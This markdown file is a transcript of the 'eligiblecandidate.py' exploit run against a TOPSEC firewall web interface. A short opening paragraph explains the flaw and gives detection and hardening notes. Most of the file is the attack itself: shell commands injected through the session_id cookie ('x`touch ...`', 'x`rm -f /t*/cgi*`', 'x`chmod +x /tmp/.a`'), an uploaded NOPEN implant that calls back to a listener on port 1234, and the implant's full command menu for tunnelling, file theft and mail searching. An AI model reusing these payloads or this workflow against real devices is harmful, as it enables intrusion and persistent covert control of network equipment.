# Eligible Candidate (ELCA) exploit

Transcript of the `eligiblecandidate.py` exploit run against a TOPSEC firewall web interface (`Server: Topsec`, remote OS reported as Linux 2.4.19 i686). The underlying flaw is OS command injection: the value of the `session_id` cookie sent to `/cgi/maincgi.cgi` reaches a shell unescaped, so a backtick-wrapped payload such as `` x`touch /w*/*/*/p*/*` `` executes with whatever privileges the CGI process has (the tool's closing "Got root?" is its own assumption, not something this log confirms). The three stages shown are: `touch`, which fingerprints the target with a HEAD request to `/site/image/white.gif` and records its ETag and `Server` header; `probe`, which injects a `touch` over the site's page files and confirms exploitability by re-reading the ETag of `/site/pages/index.html`; and `exploit`, which uploads a NOPEN server as a multipart POST (the CGI apparently stages uploads under `/tmp/cgi*`), copies it to `/tmp/.a`, marks it executable, runs it, and receives the callback on the NOPEN client listening on port 1234. Detection/hardening notes grounded in this log: alert on requests to `/cgi/maincgi.cgi` whose `session_id` cookie contains shell metacharacters (`` ` ``, `$(`, `;`, `|`), on HEAD requests for `/site/image/white.gif`, on unexpected executables or dot-files under `/tmp` (here `/tmp/.a`), and on HTTP requests carrying a Host header that is a single space (the tool's default, visible as `host=' '` in the argument dump). Note also that the tool disables TLS verification (`verify = False`), so a TLS-interposing proxy in front of the device would still see this traffic in the clear.
# cat ELCA.txt
# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234

NOPEN!                             v3.0.5.3

Wed Aug 17 18:07:07 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
NHOME=/current/bin/..
TERM=xterm-256color
Entering callback mode
Waiting...
# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecandidate.py -t https://127.0.0.1:443 touch
[+] Seeded PRNG with 1471457257.4
[+] Preparing to run specified command...
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   cid = None :: Name of session ID in cookie (default: auto)
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = False :: Load last session used.
   quiet = False :: Disable verbose logging
   binpath =  :: Path to tool being used.
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
['target']
Namespace(ask=False, binpath=u'', cert=None, cid=None, color=False, debug=False, func=<unbound method ELCAExploit.do_touch>, host=' ', loadlast=False, mode='nopen', quiet=False, session=None, target='https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Requesting head https://127.0.0.1:443/site/image/white.gif with following provided settings: {'allow_redirects': False}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "HEAD /site/image/white.gif HTTP/1.1" 200 0
[+] Etag - 439-345-4cb57ebd; Last modified - Wed Oct 13 10:41:17 2010
[+] Touch result: HEAD /site/image/white.gif - 200
[+] Touch result: Header: last-modified -- Wed, 13 Oct 2010 09:41:17 GMT
[+] Touch result: Header: content-length -- 837
[+] Touch result: Header: etag -- "439-345-4cb57ebd"
[+] Touch result: Header: date -- Wed, 17 Aug 2016 18:06:54 GMT
[+] Touch result: Header: accept-ranges -- bytes
[+] Touch result: Header: content-type -- image/gif
[+] Touch result: Header: server -- Topsec
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-190737.log and /current/down/fosho/2016-08-17-190737_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecandidate.py -l probe
[+] Seeded PRNG with 1471457319.73
[+] Preparing to run specified command...
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'allow_redirects': True}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Detected cookie id: session_id
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   cid = session_id :: Name of session ID in cookie (default: auto)
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = True :: Load last session used.
   quiet = False :: Disable verbose logging
   binpath =  :: Path to tool being used.
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
['target', 'cid']
Namespace(ask=False, binpath=u'', cert=None, cid='session_id', color=False, debug=False, func=<unbound method ELCAExploit.do_probe>, host=u' ', loadlast=True, mode=u'nopen', quiet=False, session=None, target=u'https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Checking current /site/pages/index.html etag
[+] Requesting head https://127.0.0.1:443/site/pages/index.html with following provided settings: {'allow_redirects': False}
[+] "HEAD /site/pages/index.html HTTP/1.1" 200 0
[+] Running touch on /site/pages/index.html
[+] Running command on target: x`touch /w*/*/*/p*/*`
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'cookies': {'session_id': 'x`touch /w*/*/*/p*/*`'}, 'allow_redirects': True}
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Checking etag again to confirm
[+] Requesting head https://127.0.0.1:443/site/pages/index.html with following provided settings: {'allow_redirects': False}
[+] "HEAD /site/pages/index.html HTTP/1.1" 200 0
[+] Target is vulnerable. Safe to proceed.
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-190839.log and /current/down/fosho/2016-08-17-190839_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecandidate.py -l exploit -p noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static -c 127.0.0.1:1234
[+] Seeded PRNG with 1471457351.78
[+] Preparing to run specified command...
[+] Already know cookie id: session_id
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   cid = session_id :: Name of session ID in cookie (default: auto)
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = True :: Load last session used.
   quiet = False :: Disable verbose logging
   binpath = noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static :: Path to tool being used.
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
   callback = 127.0.0.1:1234 :: Callback IP:Port for tool (Example: 127.0.0.1:12345)
['target', 'binpath', 'callback', 'mode', 'cid']
Namespace(ask=False, binpath='noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static', callback='127.0.0.1:1234', cert=None, cid='session_id', color=False, debug=False, func=<unbound method ELCAExploit.do_exploit>, host=u' ', loadlast=True, mode=u'nopen', quiet=False, session=None, target=u'https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Cleaning up /tmp/ ...
[+] Running command on target: x`rm -f /t*/cgi*`
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'cookies': {'session_id': 'x`rm -f /t*/cgi*`'}, 'allow_redirects': True}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Uploading and moving file...
[+] Requesting post https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'files': {'uiIwq': <StringIO.StringIO instance at 0xb6dab86c>}, 'cookies': {'session_id': 'x`cp /t*/cg* /tmp/.a`'}, 'data': None}
[+] "POST /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Making file executable...
[+] Running command on target: x`chmod +x /tmp/.a`
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'cookies': {'session_id': 'x`chmod +x /tmp/.a`'}, 'allow_redirects': True}
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Running payload...
[+] Running command on target: x`/tmp/.a 2>&1`
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'cookies': {'session_id': 'x`/tmp/.a 2>&1`'}, 'allow_redirects': True}
[+] "GET /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Exploit complete. Got root?
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-190911.log and /current/down/fosho/2016-08-17-190911_http.log
# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234

NOPEN!                             v3.0.5.3

Wed Aug 17 18:07:07 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
NHOME=/current/bin/..
TERM=xterm-256color
Entering callback mode
Waiting...
Listening on *:1234... ok
Accepted connection from 127.0.0.1:34192
Initiating RSA key exchange
  Generating random number... ok
  Initializing RC6... ok
  Sending random number... ok
  Receiving random number... ok
  Generating session key... 0x6FE82C9C3156C88448659B6E034C6D30
  Sending first verify string... ok
  Receiving second verify string... ok
  Checking second verify string... ok
RSA key exchange complete
NOPEN server version... 3.0.5.3

Connection
  Bytes In / Out     199/75 (265%C) / 63/4 (1575%C)
  Local Host:Port    localhost:1234 (127.0.0.1:1234)
  Remote Host:Port   127.0.0.1:0 (127.0.0.1:0)
  Remote Host:Port   (none):34192 (127.0.0.1:34192)
Local
  NOPEN client       3.0.5.3
  Date/Time          Wed Aug 17 18:09:16 UTC 2016
  History
  Command Out
  CWD                /current/bin
  NHOME              /current/bin/..
  PID (PPID)         4689 (4525)
Remote
  NOPEN server       3.0.5.3
  WDIR               NOT SET
  OS                 Linux 2.4.19 #4 Wed Oct 13 17:29:47 CST 2010 i686
  CWD
  PID (PPID)         2416 (1)

History loaded from "/current/bin/../down/history/(none).127.0.0.1"... ok
Creating command output file "/current/bin/../down/cmdout/(none).127.0.0.1-2016-08-17-18:09:17"... ok

Lonely?  Bored?  Need advice?  Maybe "-help" will show you the way.

We are starting up our virtual autoport
We are bound and ready to go on port 1025
NO! (none):>-help
[08-17-16 18:09:35 GMT][localhost:1234 -> (none).127.0.0.1:34192]
[-help]

Remote General Commands:
Usage: -elevate
Usage: -getenv
Usage: -gs category|filename [options-if-any]
Usage: -setenv VAR=[val]
Usage: -shell
Usage: -status
Usage: -time

Remote Server Commands:
Usage: -burn
Usage: -call ip port
Usage: -listen port
Usage: -pid

Remote Network Commands:
Usage: -icmptime target_ip [source_ip]
Usage: -ifconfig
Usage: -nslookup name1 ...
Usage: -ping -r remote_target_ip [-l local_source_ip] [-i|-u|-t] [-p dest_port] [-s src_port]
       -ping host
       -ping [-u|-t|-i] host
Usage: -trace -r remote_target_ip [-l local_source_ip] [-i|-u|-t] [-p dest_port] [-s src_port]
       -trace host
       -trace [-u|-t|-i] host

Remote Redirection Commands:
Usage: -fixudp port
Usage: -irtun target_ip call_back_port [call_back_ip] [ourtn arguements]
Usage: -jackpop target_ip target_port source_ip source_port
Usage: -nrtun port [toip [toport]]
Usage: -nstun toip [toport [localport [srcport [command]]]]
       -nstun toip:port
Usage: -rawsend tcp_port
Usage: -rtun port [toip [toport]]
Usage: -scan
Usage: -sentry target_address source_address (tcp|udp) dest_port src_port interface
Usage: -stun toip toport [localport [srcport]]
Usage: -sutun [-t ttl] toip toport [localport [srcport]]
Usage: -tunnel [command_listen_port [udp]]
Usage: -vscan  (should add help)

Remote File Commands:
Usage: -cat remfile
Usage: -chili [-l] [-s lines] [-m max] MM-DD-YYYY remdir remfile [remfile ...]
Usage: -cksum remfile ...
Usage: -fget [MM-DD-YYYY] loclist
Usage: -get [-l] [-q] [-s minimumsize] [-m MM-DD-YYYY] remfile ...
Usage: -grep [-d] [-v] [-n] [-i] [-h] [-C number_of_context_lines] pattern file1 [file2 ...]
Usage: -oget [-a] [-q] [-s begoff] [-b begoff] [-e endoff] remfile
Usage: -put locfile remfile [mode]
Usage: -strings remfile
Usage: -tail [+/-n] remfile, + to skip n lines of remfile beginning
Usage: -touch [-t mtime:atime | refremfile] remfile
Usage: -rm remfile|remdir ...
Usage: -upload file port
Usage: -mailgrep [-l] [-m maxbytes] [-r "regexp" [-v]] [-f regexpfilename [-v]] [-a "regexp for attachments to eliminate"] [-b MM-DD-YYYY] [-e MM-DD-YYYY] [-d remotedumpfile] remotedir file1 [file2 ...]
 ex: -mailgrep -a ".doc" -r "^Fred" -b 2-28-2002 /var/spool/mail G*

Remote Directory Commands:
Usage: -find [-M | -m -mkfindsargs] [-x[m|a|c] MM-DD-YYYY] remdir [remdir...]
Usage: -ls [-1ihuRt] [-x[m|a|c] MM-DD-YYYY] [remfile|remdir ...]
Usage: -cd [remdir]
Usage: -cdp

Local Client Commands:
Usage: -autopilot port [xml]
Usage: -cmdout [locfilename]
Usage: -exit
Usage: -help
Usage: -hist
Usage: -readrc [locfile]
Usage: -remark [comment]
Usage: -rem [comment]
Usage: # [comment]
Usage: -reset

Local Environment Commands:
Usage: -lcd locdir
Usage: -lgetenv
Usage: -lpwd
Usage: -lsetenv VAR=[val]
Usage: -lsh [[-q] command]

Aliases:

NO! (none):>
